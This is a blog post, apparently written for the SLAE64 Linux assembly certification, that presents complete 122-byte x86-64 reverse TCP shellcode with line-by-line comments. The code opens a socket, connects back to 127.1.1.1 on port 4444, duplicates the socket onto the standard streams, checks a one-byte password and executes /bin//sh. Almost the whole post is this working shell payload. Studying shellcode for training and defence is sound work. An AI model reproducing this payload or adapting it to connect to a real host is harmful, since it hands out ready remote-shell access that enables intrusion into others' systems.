SLAE64 #2 - Revshell TCP shellcode

This shellcode is very similar to the Bindshell TCP shellcode, so please refer to it for the unique and interesting points. There is only 1 additional point I would like to make:

  1. Line 8/37: Listen on 127.1.1.1 instead of 127.0.0.1. This saves us from having to nullify the 2 bytes in the middle.

Total size: 122 bytes

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
global _start

section .text

_start: 

    jmp $+10
    rev_data_struct: db 0x02, 0x01, 0x11, 0x5c, 0x7f, 0x01, 0x01, 0x01


shell:

    ; store data struct address in r8
    lea r8, [rel rev_data_struct]

    ; sock = socket(AF_INET, SOCK_STREAM, 0)
    ; AF_INET = 2
    ; SOCK_STREAM = 1
    ; syscall number 41 

    xor rax, rax
    mov al, 41
    xor rdi, rdi
    mov dil, 2
    xor rsi, rsi
    mov sil, 1
    xor rdx, rdx
    syscall

    ; copy socket descriptor to rdi for future use 

    mov rdi, rax


    ; server.sin_family = AF_INET 
    ; server.sin_port = htons(PORT)
    ; server.sin_addr.s_addr = inet_addr("127.1.1.1")
    ; bzero(&server.sin_zero, 8)
    ; remove 0x1 by subtracting

    sub byte [r8+1], 0x1

    mov al, 42
    mov rsi, r8
    mov dl, 16
    syscall


    ; duplicate sockets

    ; STDIN
    mov al, 33
    xor rsi, rsi
    syscall

    ; STDOUT
    mov al, 33
    mov sil, 1
    syscall

    ; STDERR
    mov al, 33
    mov sil, 2
    syscall

    ;read password and store in first byte of r8
    xor rax, rax
    lea rsi, [r8]
    mov dl, 1
    syscall

    ; check password against expected password | , if fail jump out of bounds, should cause a segfault
    cmp byte [rsi], 0x7C
    jnz $+44

    ; execve

    ; First NULL push

    xor rax, rax
    push rax

    ; push /bin//sh in reverse

    mov rbx, 0x68732f2f6e69622f
    push rbx

    ; store /bin//sh address in RDI

    mov rdi, rsp

    ; Second NULL push
    push rax

    ; set RDX
    mov rdx, rsp


    ; Push address of /bin//sh
    push rdi

    ; set RSI

    mov rsi, rsp

    ; Call the Execve syscall
    mov al, 59
    syscall

This blog post has (not) been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE64-XXXXX